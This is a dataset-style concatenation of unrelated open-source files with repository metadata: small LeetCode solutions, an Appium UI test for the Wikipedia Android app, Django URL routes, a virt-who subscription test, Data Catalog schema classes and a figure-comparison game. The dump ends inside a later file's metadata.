2a622eeb655398ca9ebd9feee93a52cd114a77c4
|
d557faf87374ad8c65634ee9d9e572b88a54913a
|
refs/heads/master
| 2021-07-12T06:58:57.162657 | 2021-04-18T13:25:03 | 2021-04-18T13:25:03 | 244,403,881 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 456 |
py
|
# 给定一个整数,写一个函数来判断它是否是 3 的幂次方。
class Solution(object):
    def isPowerOfThree(self, n):
        """Return True if n == 3**k for some integer k >= 0.

        :type n: int
        :rtype: bool
        """
        # Zero and negatives can never be a power of three.
        if n <= 0:
            return False
        # Divide out factors of 3 with floor division: the original
        # `n /= 3` produced floats, which lose exactness for powers of
        # three larger than 2**53.
        while n % 3 == 0:
            n //= 3
        return n == 1
if __name__ == '__main__':
    # Quick manual check: 9 == 3**2, so this prints True.
    ob = Solution()
    print(ob.isPowerOfThree(9))
|
[
"[email protected]"
] | |
37ad995aa7d1d0d0fc4db7476eed8c5d9fcb4d47
|
32eeb97dff5b1bf18cf5be2926b70bb322e5c1bd
|
/benchmark/wikipedia/testcase/interestallcases/testcase1_008_0.py
|
34135d8ab0a3e138c9938ad9ce244b9bbea57ae9
|
[] |
no_license
|
Prefest2018/Prefest
|
c374d0441d714fb90fca40226fe2875b41cf37fc
|
ac236987512889e822ea6686c5d2e5b66b295648
|
refs/heads/master
| 2021-12-09T19:36:24.554864 | 2021-12-06T12:46:14 | 2021-12-06T12:46:14 | 173,225,161 | 5 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 6,965 |
py
|
#coding=utf-8
import os
import subprocess
import time
import traceback
from appium import webdriver
from appium.webdriver.common.touch_action import TouchAction
from selenium.common.exceptions import NoSuchElementException, WebDriverException
# Appium desired capabilities: drive the Wikipedia app on an Android 4.4
# emulator, with Jacoco instrumentation enabled so coverage can be dumped
# via broadcast after each testcase.
desired_caps = {
    'platformName' : 'Android',
    'deviceName' : 'Android Emulator',
    'platformVersion' : '4.4',
    'appPackage' : 'org.wikipedia',
    'appActivity' : 'org.wikipedia.main.MainActivity',
    'resetKeyboard' : True,
    'androidCoverage' : 'org.wikipedia/org.wikipedia.JacocoInstrumentation',
    'noReset' : True
}
def command(cmd, timeout=5):
    """Run a shell command, let it work for `timeout` seconds, then kill it."""
    proc = subprocess.Popen(cmd, stderr=subprocess.STDOUT,
                            stdout=subprocess.PIPE, shell=True)
    time.sleep(timeout)
    proc.terminate()
    return
def getElememt(driver, str) :
    # Retry lookup: poll up to 5 times (1 s apart) for the element matching
    # the UiAutomator selector string.  As a last resort, tap (50, 50) to
    # dismiss a possible overlay and try once more; that final attempt may
    # still raise NoSuchElementException.
    for i in range(0, 5, 1):
        try:
            element = driver.find_element_by_android_uiautomator(str)
        except NoSuchElementException:
            time.sleep(1)
        else:
            return element
    os.popen("adb shell input tap 50 50")
    element = driver.find_element_by_android_uiautomator(str)
    return element
def getElememtBack(driver, str1, str2) :
    # Like getElememt, but with a preferred selector (str1, tried twice)
    # and a fallback selector (str2, tried five times, then once after a
    # screen tap).  The final attempt may raise NoSuchElementException.
    for i in range(0, 2, 1):
        try:
            element = driver.find_element_by_android_uiautomator(str1)
        except NoSuchElementException:
            time.sleep(1)
        else:
            return element
    for i in range(0, 5, 1):
        try:
            element = driver.find_element_by_android_uiautomator(str2)
        except NoSuchElementException:
            time.sleep(1)
        else:
            return element
    os.popen("adb shell input tap 50 50")
    element = driver.find_element_by_android_uiautomator(str2)
    return element
def swipe(driver, startxper, startyper, endxper, endyper):
    """Swipe across the screen using fractional (0..1) coordinates.

    Retries once after a 1 s pause if the first swipe raises
    WebDriverException.
    """
    size = driver.get_window_size()
    x_from = int(size["width"] * startxper)
    y_from = int(size["height"] * startyper)
    x_to = int(size["width"] * endxper)
    y_to = int(size["height"] * endyper)
    try:
        driver.swipe(start_x=x_from, start_y=y_from, end_x=x_to,
                     end_y=y_to, duration=2000)
    except WebDriverException:
        time.sleep(1)
        driver.swipe(start_x=x_from, start_y=y_from, end_x=x_to,
                     end_y=y_to, duration=2000)
    return
def scrollToFindElement(driver, str) :
    # Swipe upward (scrolling content down) up to 5 screens until the
    # element matching the selector string appears; returns None if it
    # never becomes visible.
    for i in range(0, 5, 1):
        try:
            element = driver.find_element_by_android_uiautomator(str)
        except NoSuchElementException:
            swipe(driver, 0.5, 0.6, 0.5, 0.2)
        else:
            return element
    return
def clickoncheckable(driver, str, value = "true") :
    # Find the preference row (a LinearLayout) that contains the element
    # matching `str`, locate its checkable widget, and toggle it only if
    # its current "checked" state differs from the desired `value`
    # ("true"/"false" as strings, matching get_attribute's return).
    parents = driver.find_elements_by_class_name("android.widget.LinearLayout")
    for parent in parents:
        try :
            parent.find_element_by_android_uiautomator(str)
            lists = parent.find_elements_by_class_name("android.widget.LinearLayout")
            # Only leaf rows (a single nested layout) host the switch widget.
            if (len(lists) == 1) :
                innere = parent.find_element_by_android_uiautomator("new UiSelector().checkable(true)")
                nowvalue = innere.get_attribute("checked")
                if (nowvalue != value) :
                    innere.click()
                break
        except NoSuchElementException:
            continue
# preference setting and exit
# Python 2 script: configure the app's developer and display preferences
# before the actual testcase runs, then dump a pre-test coverage snapshot.
try :
    # NOTE(review): "diable" looks like a typo for "disable" — as written
    # this adb command is a no-op; confirm intent before fixing.
    os.popen("adb shell svc data diable")
    time.sleep(5)
    starttime = time.time()
    driver = webdriver.Remote('http://localhost:4723/wd/hub', desired_caps)
    os.popen("adb shell am start -n org.wikipedia/org.wikipedia.settings.DeveloperSettingsActivity")
    scrollToFindElement(driver, "new UiSelector().text(\"useRestbase_setManually\")").click()
    clickoncheckable(driver, "new UiSelector().text(\"useRestbase_setManually\")", "true")
    scrollToFindElement(driver, "new UiSelector().text(\"suppressNotificationPolling\")").click()
    clickoncheckable(driver, "new UiSelector().text(\"suppressNotificationPolling\")", "false")
    scrollToFindElement(driver, "new UiSelector().text(\"memoryLeakTest\")").click()
    clickoncheckable(driver, "new UiSelector().text(\"memoryLeakTest\")", "true")
    scrollToFindElement(driver, "new UiSelector().text(\"readingListLoginReminder\")").click()
    clickoncheckable(driver, "new UiSelector().text(\"readingListLoginReminder\")", "false")
    scrollToFindElement(driver, "new UiSelector().text(\"readingListsFirstTimeSync\")").click()
    clickoncheckable(driver, "new UiSelector().text(\"readingListsFirstTimeSync\")", "true")
    # keycode 4 == BACK: leave the developer settings screen
    driver.press_keycode(4)
    time.sleep(2)
    os.popen("adb shell am start -n org.wikipedia/org.wikipedia.settings.SettingsActivity")
    scrollToFindElement(driver, "new UiSelector().text(\"Show link previews\")").click()
    clickoncheckable(driver, "new UiSelector().text(\"Show link previews\")", "false")
    scrollToFindElement(driver, "new UiSelector().text(\"Download only over Wi-Fi\")").click()
    clickoncheckable(driver, "new UiSelector().text(\"Download only over Wi-Fi\")", "false")
    scrollToFindElement(driver, "new UiSelector().text(\"Show images\")").click()
    clickoncheckable(driver, "new UiSelector().text(\"Show images\")", "false")
    driver.press_keycode(4)
    time.sleep(2)
except Exception, e:
    print 'FAIL'
    print 'str(e):\t\t', str(e)
    print 'repr(e):\t', repr(e)
    print traceback.format_exc()
finally :
    endtime = time.time()
    print 'consumed time:', str(endtime - starttime), 's'
    # Broadcast asks the instrumented app to dump the Jacoco coverage file.
    command("adb shell am broadcast -a com.example.pkg.END_EMMA --es name \"1_008_pre\"")
    jacocotime = time.time()
    print 'jacoco time:', str(jacocotime - endtime), 's'
    driver.quit()
# testcase008
# The generated test: long-press the overflow menu, open a card, dismiss
# the onboarding tooltip, and tap the share action; afterwards dump
# coverage and force-stop any foreign foreground app.
try :
    starttime = time.time()
    driver = webdriver.Remote('http://localhost:4723/wd/hub', desired_caps)
    element = getElememt(driver, "new UiSelector().resourceId(\"org.wikipedia:id/menu_overflow_button\").className(\"android.widget.TextView\")")
    TouchAction(driver).long_press(element).release().perform()
    swipe(driver, 0.5, 0.8, 0.5, 0.2)
    element = getElememt(driver, "new UiSelector().resourceId(\"org.wikipedia:id/menu_overflow_button\").className(\"android.widget.TextView\")")
    TouchAction(driver).long_press(element).release().perform()
    element = getElememt(driver, "new UiSelector().resourceId(\"org.wikipedia:id/icon\").className(\"android.widget.ImageView\")")
    TouchAction(driver).tap(element).perform()
    element = getElememtBack(driver, "new UiSelector().text(\"Got it\")", "new UiSelector().className(\"android.widget.TextView\").instance(2)")
    TouchAction(driver).tap(element).perform()
    element = getElememt(driver, "new UiSelector().resourceId(\"org.wikipedia:id/view_static_card_icon\").className(\"android.widget.ImageView\")")
    TouchAction(driver).tap(element).perform()
    element = getElememt(driver, "new UiSelector().className(\"android.widget.ImageView\").description(\"Share the article link\")")
    TouchAction(driver).tap(element).perform()
except Exception, e:
    print 'FAIL'
    print 'str(e):\t\t', str(e)
    print 'repr(e):\t', repr(e)
    print traceback.format_exc()
else:
    print 'OK'
finally:
    cpackage = driver.current_package
    endtime = time.time()
    print 'consumed time:', str(endtime - starttime), 's'
    command("adb shell am broadcast -a com.example.pkg.END_EMMA --es name \"1_008\"")
    jacocotime = time.time()
    print 'jacoco time:', str(jacocotime - endtime), 's'
    driver.quit()
    # If the test navigated away from Wikipedia, kill the foreground app.
    if (cpackage != 'org.wikipedia'):
        cpackage = "adb shell am force-stop " + cpackage
        os.popen(cpackage)
os.popen("adb shell svc data enable")
|
[
"[email protected]"
] | |
ee0c0439bc8653fcafc1eda4272bc03c2c60a56f
|
fafee9d79beb7433633d59dce865efb437d608f6
|
/__init__.py
|
89ba90efec4b90e8c130bf0cd0c31e76b9df484d
|
[
"MIT",
"BSD-3-Clause"
] |
permissive
|
PabloRomanH/cihaidata-unihan
|
65830d945e50518895ce3f06a211a117cd502b84
|
c408b57f61b5b13926f42c3647cc0bc61da758be
|
refs/heads/master
| 2021-01-12T22:33:15.289066 | 2016-06-03T17:37:40 | 2016-06-03T17:37:40 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 674 |
py
|
#!/usr/bin/env python
# -*- coding: utf8 - *-
"""Tool to build `Unihan`_ dataset into datapackage / simple data format."""
from __future__ import absolute_import, division, print_function, \
with_statement, unicode_literals
# Package metadata, read by setup.py and introspection tooling.
__title__ = 'cihaidata-python'
__package_name__ = 'cihaidata_python'
__description__ = 'Tool to build `Unihan`_ dataset into datapackage / simple data format.'
__version__ = '0.0.1'
__author__ = 'Tony Narlock'
__email__ = '[email protected]'
__license__ = 'MIT'
__copyright__ = 'Copyright 2013-2014 Tony Narlock'
from .unihan import Unihan, check_install, create_table, flatten_datasets
from .scripts import save, download, extract, convert
|
[
"[email protected]"
] | |
dba9cbb205056e92cf377392703f257eafae100a
|
242f1dafae18d3c597b51067e2a8622c600d6df2
|
/src/1400-1499/1486.xor.in.array.py
|
9f93fdedc92c4d84e1a7f4947d3adae6aec16ebd
|
[] |
no_license
|
gyang274/leetcode
|
a873adaa083270eb05ddcdd3db225025533e0dfe
|
6043134736452a6f4704b62857d0aed2e9571164
|
refs/heads/master
| 2021-08-07T15:15:01.885679 | 2020-12-22T20:57:19 | 2020-12-22T20:57:19 | 233,179,192 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 235 |
py
|
class Solution:
    def xorOperation(self, n: int, start: int) -> int:
        """XOR of the implicit array nums, where nums[i] = start + 2*i
        for 0 <= i < n.

        O(n) time, O(1) space; a closed-form O(1) answer exists but is
        considerably trickier to get right.
        """
        acc = 0
        for value in range(start, start + 2 * n, 2):
            acc ^= value
        return acc
|
[
"[email protected]"
] | |
7cb4b4d3b8da5d4f881a238fd2bb87a15a3dbb29
|
d94b6845aeeb412aac6850b70e22628bc84d1d6d
|
/d3pm/text/main_test.py
|
ddcfcfad48bbd428ea167bea70a1e48d197f9795
|
[
"CC-BY-4.0",
"Apache-2.0"
] |
permissive
|
ishine/google-research
|
541aea114a68ced68736340e037fc0f8257d1ea2
|
c1ae273841592fce4c993bf35cdd0a6424e73da4
|
refs/heads/master
| 2023-06-08T23:02:25.502203 | 2023-05-31T01:00:56 | 2023-05-31T01:06:45 | 242,478,569 | 0 | 0 |
Apache-2.0
| 2020-06-23T01:55:11 | 2020-02-23T07:59:42 |
Jupyter Notebook
|
UTF-8
|
Python
| false | false | 1,725 |
py
|
# coding=utf-8
# Copyright 2023 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test for the main executable."""
import random
from absl.testing import absltest
import jax
import numpy as np
import tensorflow_datasets as tfds
from d3pm.text import configs
from d3pm.text import main
class MainTest(absltest.TestCase):
    def test_small_training_job(self):
        """Smoke test: one tiny training step end-to-end on mocked data."""
        experiment_dir = self.create_tempdir().full_path
        # Disable compiler optimizations for faster compile time.
        jax.config.update('jax_disable_most_optimizations', True)
        # Seed the random number generators.
        random.seed(0)
        np.random.seed(0)
        # Construct a test config with a small number of steps.
        configs.gin_load('lm1b_tiny')
        with tfds.testing.mock_data(num_examples=2048):
            # Make sure we can train without any exceptions.
            main.run_experiment(
                experiment_dir,
                batch_size_per_device=1,
                max_train_steps=1,
                validate_every=5,
                train_summary_frequency=5,
                num_eval_steps=5,
                num_predict_steps=1,
                restore_checkpoint=False,
                checkpoint_frequency=None,
            )
if __name__ == '__main__':
    absltest.main()
|
[
"[email protected]"
] | |
15af76b56f23169ecae06276f96acb2561d4c1b9
|
6480db97bf64fe5020bca084c38b7728ba9a1b9a
|
/pursuit/src/mvp_landing/urls.py
|
e10ed7a8489bdc075f57077b42c3bc7754100fd9
|
[] |
no_license
|
masterfung/mvp_landing-Django
|
056727d3c7107f18ea5203b98816bad9bb94edaa
|
4ae2d9128e13616ca2e4e82e36927a352f515858
|
refs/heads/master
| 2021-01-13T02:35:57.392427 | 2014-06-02T14:30:37 | 2014-06-02T14:30:37 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 731 |
py
|
from django.conf.urls import patterns, include, url
from django.conf import settings
from django.conf.urls.static import static
from django.contrib import admin
admin.autodiscover()
# URL routes for the landing site (old-style Django `patterns` syntax).
urlpatterns = patterns('',
    # Examples: #has to be in order when it comes to views
    url(r'^$', 'signups.views.home', name='home'),
    # url(r'^blog/', include('blog.urls')),
    url(r'^thank-you/$', 'signups.views.thankyou', name='thankyou'),
    url(r'^about-us/$', 'signups.views.aboutus', name='aboutus'),
    url(r'^admin/', include(admin.site.urls)),
)
# Serve static/media files directly only in development.
if settings.DEBUG:
    urlpatterns += static(settings.STATIC_URL, document_root = settings.STATIC_ROOT)
    urlpatterns += static(settings.MEDIA_URL, document_root = settings.MEDIA_ROOT)
|
[
"[email protected]"
] | |
1575804de3dd437ba9e8b545b69edced761183fd
|
78d425c98f093e01dd78c15ffa76cf50f7e4fe1e
|
/tests/tier1/tc_1087_check_vdc_virtual_pool_revoked_in_guest_after_host_unattached.py
|
c2f7f74a50aa84f8b13159dec95faef8625f8fe0
|
[] |
no_license
|
Junefen/virtwho-ci
|
57ef8637a78605fd3f2b1d3eb31031ba2b0de480
|
23e144171d2cc6ee87edfefdace8a25eb3e7bc65
|
refs/heads/master
| 2023-03-19T04:16:08.055779 | 2021-09-29T03:52:08 | 2021-09-29T03:52:08 | 194,606,208 | 0 | 0 | null | 2019-07-01T05:35:22 | 2019-07-01T05:35:22 | null |
UTF-8
|
Python
| false | false | 2,453 |
py
|
# coding:utf-8
from virt_who import *
from virt_who.base import Base
from virt_who.register import Register
from virt_who.testing import Testing
class Testcase(Testing):
    def test_run(self):
        """Verify a VDC virtual pool is revoked from the guest after the
        physical SKU is unattached from its host/hypervisor (RHEL-134064).
        """
        self.vw_case_info(os.path.basename(__file__), case_id='RHEL-134064')
        self.vw_case_init()
        # case config
        results = dict()
        virtwho_conf = "/etc/virt-who.conf"
        self.vw_option_enable('[global]', virtwho_conf)
        self.vw_option_enable('debug', virtwho_conf)
        self.vw_option_update_value('debug', 'True', virtwho_conf)
        config_name = "virtwho-config"
        config_file = "/etc/virt-who.d/{0}.conf".format(config_name)
        self.vw_etc_d_mode_create(config_name, config_file)
        host_name = self.get_hypervisor_hostname()
        host_uuid = self.get_hypervisor_hostuuid()
        register_config = self.get_register_config()
        vdc_physical_sku = register_config['vdc']
        vdc_virtual_sku = register_config['vdc_bonus']
        # case steps
        logger.info(">>>step1: run virt-who and check the mapping info is sent or not")
        data, tty_output, rhsm_output = self.vw_start()
        res = self.op_normal_value(data, exp_error=0, exp_thread=1, exp_send=1)
        results.setdefault('step1', []).append(res)
        logger.info(">>>step2: attach physical sku for host/hypervisor")
        sku_attrs = self.system_sku_attr(self.ssh_host(), vdc_physical_sku, "physical")
        physical_pool_id = sku_attrs['pool_id']
        self.vw_web_attach(host_name, host_uuid, physical_pool_id)
        logger.info(">>>step3: attach virtual sku by pool_id in guest")
        sku_attrs = self.system_sku_attr(self.ssh_guest(), vdc_virtual_sku, "virtual")
        virtual_pool_id = sku_attrs['pool_id']
        self.system_sku_attach(self.ssh_guest(), pool_id=virtual_pool_id)
        output = self.system_sku_consumed(self.ssh_guest())
        res = self.vw_msg_search(output, vdc_virtual_sku, exp_exist=True)
        results.setdefault('step3', []).append(res)
        logger.info(">>>step4: unattach physical sku from host/hypervisor and check virtual pool")
        self.vw_web_unattach(host_name, host_uuid)
        output = self.system_sku_consumed(self.ssh_guest(), exp_exist=False)
        res = self.vw_msg_search(output, vdc_virtual_sku, exp_exist=False)
        results.setdefault('step4', []).append(res)
        # case result
        self.vw_case_result(results)
|
[
"[email protected]"
] | |
ada54b21eb805ba13403e644e467913924e72667
|
d56828f1f7ae8fbb1fc2e79f84c82c4be1d13651
|
/google/cloud/datacatalog_v1/types/schema.py
|
4a51a1226512ae2416ba971f949dedc02bb6bb30
|
[
"Apache-2.0"
] |
permissive
|
isabella232/python-datacatalog
|
940d7664d55ae01524f7fe89f8a295e9190ec23c
|
d16420640ec97c17e4c63516b8375b41df82de9c
|
refs/heads/master
| 2022-12-19T23:03:49.561389 | 2020-10-16T19:58:42 | 2020-10-16T19:58:42 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,287 |
py
|
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
__protobuf__ = proto.module(
package="google.cloud.datacatalog.v1", manifest={"Schema", "ColumnSchema",},
)
class Schema(proto.Message):
    r"""Represents a schema (e.g. BigQuery, GoogleSQL, Avro schema).
    Attributes:
        columns (Sequence[~.schema.ColumnSchema]):
            Required. Schema of columns. A maximum of
            10,000 columns and sub-columns can be specified.
    """

    # Field number 2 mirrors the .proto definition; do not renumber.
    columns = proto.RepeatedField(proto.MESSAGE, number=2, message="ColumnSchema",)
class ColumnSchema(proto.Message):
    r"""Representation of a column within a schema. Columns could be
    nested inside other columns.
    Attributes:
        column (str):
            Required. Name of the column.
        type (str):
            Required. Type of the column.
        description (str):
            Optional. Description of the column. Default
            value is an empty string.
        mode (str):
            Optional. A column's mode indicates whether the values in
            this column are required, nullable, etc. Only ``NULLABLE``,
            ``REQUIRED`` and ``REPEATED`` are supported. Default mode is
            ``NULLABLE``.
        subcolumns (Sequence[~.schema.ColumnSchema]):
            Optional. Schema of sub-columns. A column can
            have zero or more sub-columns.
    """

    # Field numbers mirror the .proto definition; do not renumber.
    column = proto.Field(proto.STRING, number=6)
    type = proto.Field(proto.STRING, number=1)
    description = proto.Field(proto.STRING, number=2)
    mode = proto.Field(proto.STRING, number=3)
    subcolumns = proto.RepeatedField(proto.MESSAGE, number=7, message="ColumnSchema",)
# Public API of this module: every message declared in the proto manifest.
__all__ = tuple(sorted(__protobuf__.manifest))
|
[
"[email protected]"
] | |
72ff8c3550a9d80982b6ab69f568c80f8e65b8c8
|
df8c19c952f02e3527c0e06c1d74ed578ca0684b
|
/account/tasks.py
|
73d9501a1106ab6067bb90300b4c9dafed75e5bc
|
[] |
no_license
|
knkemree/msrugs_backend
|
ac8c703fb691c9a796028cb2c38abaf8ed98c98c
|
850026b2884e7618404ecfa030beccec93bb4596
|
refs/heads/master
| 2023-04-03T04:31:13.557762 | 2021-04-05T17:26:34 | 2021-04-05T17:26:34 | 354,910,411 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 494 |
py
|
from celery import shared_task
from django.core.mail import send_mail, mail_admins
from django.template import loader
from django.conf import settings
from celery.utils.log import get_task_logger
logger = get_task_logger(__name__)


@shared_task
def info_admins(email):
    """Celery task: e-mail the site admins (ADMINS setting) that a new
    customer registered; returns mail_admins' result."""
    subject = "New Customer Registered"
    message = "New customer"
    html_body = "A new customer registered! Customer's email address is " + str(email)
    return mail_admins(subject, message, html_message=html_body)
|
[
"[email protected]"
] | |
910afd2efa42ada5dd22923f2a6c53a466fb5a1f
|
c577d0d804ef826131a8a959ed10879d3fdfef2a
|
/profiles/migrations/0008_auto_20190206_2142.py
|
88de9108773cc666cfb035325fb04299faba7c2f
|
[] |
no_license
|
AlexFrundin/four
|
3d561e2f33e007e93b975b247752c06b392b1945
|
c937e0dc159f380abbcb5e646ebdf2a7a8fd6be0
|
refs/heads/master
| 2020-04-30T10:55:31.020357 | 2019-03-20T18:06:26 | 2019-03-20T18:06:26 | 176,788,979 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 395 |
py
|
# Generated by Django 2.1.3 on 2019-02-06 19:42
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated: makes Profile.birth optional (nullable and blankable).

    dependencies = [
        ('profiles', '0007_auto_20190206_1917'),
    ]
    operations = [
        migrations.AlterField(
            model_name='profile',
            name='birth',
            field=models.DateField(blank=True, null=True),
        ),
    ]
|
[
"[email protected]"
] | |
c344e931dbc0bea19cfd8ade72f0e23e73c9944c
|
6bf7149077f539ab599db1f717c93aca82724512
|
/workshop/fig_games/project/game.py
|
28aac4f8ed638b7cc05a55b9da86ae835c56af25
|
[] |
no_license
|
KalinHar/OOP-Python-SoftUni
|
8b53e8b734b364878c5372525c4249fdd32f0899
|
9787eea7ab5101e887ed4aaeb0a8b3b80efcfdd7
|
refs/heads/master
| 2023-07-09T08:15:59.765422 | 2021-08-16T06:01:08 | 2021-08-16T06:01:19 | 380,813,294 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,577 |
py
|
from workshop.fig_games.project.suitcase import Suitcase
from workshop.fig_games.project.battle.area_battle import AreaBattle
from workshop.fig_games.project.battle.circumfernce_battle import CircumferenceBattle
from workshop.fig_games.project.battle.relative_battle import RelativeBattle
from workshop.fig_games.project.figure.triangle import Triangle
from workshop.fig_games.project.figure.circle import Circle
from workshop.fig_games.project.figure.square import Square
from workshop.fig_games.project.figure.rectangle import Rectangle
class Game:
    """Runs elimination battles between the figures stored in a Suitcase."""

    def __init__(self):
        self.figures = Suitcase()

    @staticmethod
    def _winner_name(battle, fig1, fig2):
        # Shared by all three battle kinds: a battle returns the winning
        # figure, or a falsy value on a draw; expose the name or None.
        result = battle.battle(fig1, fig2)
        if result:
            return result.name
        return None

    def area_battle(self, fig1, fig2):
        """Name of the figure with the larger area, or None on a draw."""
        return self._winner_name(AreaBattle(), fig1, fig2)

    def circumference_battle(self, fig1, fig2):
        """Name of the figure with the larger circumference, or None on a draw."""
        return self._winner_name(CircumferenceBattle(), fig1, fig2)

    def relative_battle(self, fig1, fig2):
        """Name of the winner by the relative (tie-break) metric."""
        return self._winner_name(RelativeBattle(), fig1, fig2)

    def total_battle(self):
        """Pop figures pairwise; each round's winner goes back into the
        suitcase until a single figure remains, which is returned."""
        while len(self.figures.repository) > 1:
            fig1 = self.figures.repository.pop()  # take first two figs
            fig2 = self.figures.repository.pop()  # take first two figs
            wins = [self.area_battle(fig1, fig2),
                    self.circumference_battle(fig1, fig2)]
            # Unique non-draw winner names from the two primary battles.
            wins = list(set(fig for fig in wins if fig))
            if len(wins) == 1:  # unambiguous winner
                self.figures.add([f for f in (fig1, fig2) if f.name == wins[0]][0])
                continue
            # Draw or split decision: fall back to the relative battle.
            winner = self.relative_battle(fig1, fig2)
            self.figures.add([f for f in (fig1, fig2) if f.name == winner][0])
        return self.figures.repository[0]

    def __str__(self):
        # NOTE: stringifying the game runs the tournament (mutates figures).
        return f"The winner is:\n{str(self.total_battle())}"
# Manual demo: build a suitcase of figures, run the individual battles,
# then print the full tournament result.
tri1 = Triangle("tri1", 9, 4, 6.5, 4.5)
tri2 = Triangle("tri2", 5, 2.4, 3, 4)
cir1 = Circle("cir1", 3)
rec1 = Rectangle("rec1", 1, 7)
squ1 = Square("squ1", 6)
g = Game()
print(g.figures.add(tri1))
print(g.figures.add(tri2))
print(g.figures.add(cir1))
print(g.figures.add(rec1))
print(g.figures.add(squ1))
print(g.area_battle(cir1, tri1))
print(g.circumference_battle(cir1, tri1))
print(g.relative_battle(cir1, tri1))
print(g.figures.remove("squ1"))
print(g.figures)
print("-------------")
# Printing the game runs the tournament (Game.__str__ calls total_battle).
print(g)
|
[
"[email protected]"
] | |
802695a099e500fec46d761a6bc06d2bd5ff349a
|
4ba4ae24e734686f28fe395390a2d0210eb88458
|
/programas/galeria/orbita de .5 sobre la logística/orbita_0.5_logistica.py
|
c2fdeeaff5bbbd9bcf411db25878759de40fc3e1
|
[] |
no_license
|
fhca/Sistemas-Complejos-1
|
a7578ae981c694ae2500a847adfe79c6c58c69ae
|
a2b70adf3859dd6a7318da98228adef78698f9c5
|
refs/heads/master
| 2021-01-15T19:59:49.778497 | 2017-12-16T03:34:51 | 2017-12-16T03:34:51 | 99,835,884 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 690 |
py
|
__author__ = 'fhca'
import numpy as np
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import axes3d
from matplotlib import cm
def logistic(c, x):
    """One step of the logistic map: x -> c * x * (1 - x)."""
    growth = 1 - x
    return c * x * growth
def evaluate(n, x0, c, f):
    """Iterate the map f(c, .) n times starting from x0 and return the
    n-th iterate (x0 itself when n == 0)."""
    value = x0
    for _ in range(n):
        value = f(c, value)
    return value
# Plot the orbit of x0 = 0.5 under the logistic map as a 3-D surface:
# X axis = parameter c in [0, 4], Y axis = iteration count n, Z = n-th iterate.
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
C = np.linspace(0, 4, 200)
N = np.arange(1, 2001)
X, Y = np.meshgrid(C, N)
#Z = evaluate(Y, .5, X, logistic)
# evaluate() is scalar (its loop count depends on n), so fill Z pointwise.
Z = np.empty_like(X)
for i in range(X.shape[0]):
    for j in range(X.shape[1]):
        Z[i, j] = evaluate(Y[i, j], .5, X[i, j], logistic)
ax.plot_surface(X, Y, Z, rstride=10, cstride=10, cmap=cm.jet, linewidth=0,)
plt.show()
|
[
"[email protected]"
] | |
cff3e9148fe021dbca2f36fd24270a1aace86027
|
d9aa525b6a359378572fa7e48bd4fb8529b9ce23
|
/monitoring/services/tests.py
|
2e6a0fa69ed320fbbe1fcc4f7506227fdb4949ab
|
[
"Apache-2.0"
] |
permissive
|
naanal/monasca-ui
|
cb5b7c279836d31809392d5b4572536fbea3634e
|
37d8926015e35f8949606183469d532924ab58c2
|
refs/heads/master
| 2020-02-26T13:04:25.471867 | 2016-08-16T05:39:24 | 2016-08-16T05:39:24 | 64,387,546 | 0 | 0 | null | 2016-07-28T10:46:54 | 2016-07-28T10:46:53 | null |
UTF-8
|
Python
| false | false | 1,595 |
py
|
# coding=utf-8
from django.core import urlresolvers
from django.test import RequestFactory
from mock import patch, call # noqa
from monitoring.test import helpers
from monitoring.services import constants
from monitoring.services import views
INDEX_URL = urlresolvers.reverse(
constants.URL_PREFIX + 'index')
class ServicesTest(helpers.TestCase):
    def test_index_get(self):
        """The services index view renders both expected templates."""
        res = self.client.get(INDEX_URL)
        self.assertTemplateUsed(
            res, 'monitoring/services/index.html')
        self.assertTemplateUsed(res, 'monitoring/services/monitor.html')
class KibanaProxyViewTest(helpers.TestCase):
    def setUp(self):
        super(KibanaProxyViewTest, self).setUp()
        self.view = views.KibanaProxyView()
        self.request_factory = RequestFactory()
    def test_get_relative_url_with_unicode(self):
        """Tests if it properly converts multibyte characters"""
        # Python 2 module; imported locally to keep the dependency scoped.
        import urlparse
        self.view.request = self.request_factory.get(
            '/', data={'a': 1, 'b': 2}
        )
        # 'あ' must be percent-encoded as its UTF-8 bytes (%E3%81%82).
        expected_path = ('/elasticsearch/.kibana/search'
                         '/New-Saved-Search%E3%81%82')
        expected_qs = {'a': ['1'], 'b': ['2']}
        url = self.view.get_relative_url(
            u'/elasticsearch/.kibana/search/New-Saved-Searchあ'
        )
        # order of query params may change
        parsed_url = urlparse.urlparse(url)
        actual_path = parsed_url.path
        actual_qs = urlparse.parse_qs(parsed_url.query)
        self.assertEqual(actual_path, expected_path)
        self.assertEqual(actual_qs, expected_qs)
|
[
"[email protected]"
] | |
50c0db940d1a81503c735523e554c2f9aa4e8c25
|
be0f3dfbaa2fa3d8bbe59229aef3212d032e7dd1
|
/Gauss_v45r10p1/Gen/DecFiles/options/31503010.py
|
a0d860e470e74eab4f359406d68c4a1e5df58223
|
[] |
no_license
|
Sally27/backup_cmtuser_full
|
34782102ed23c6335c48650a6eaa901137355d00
|
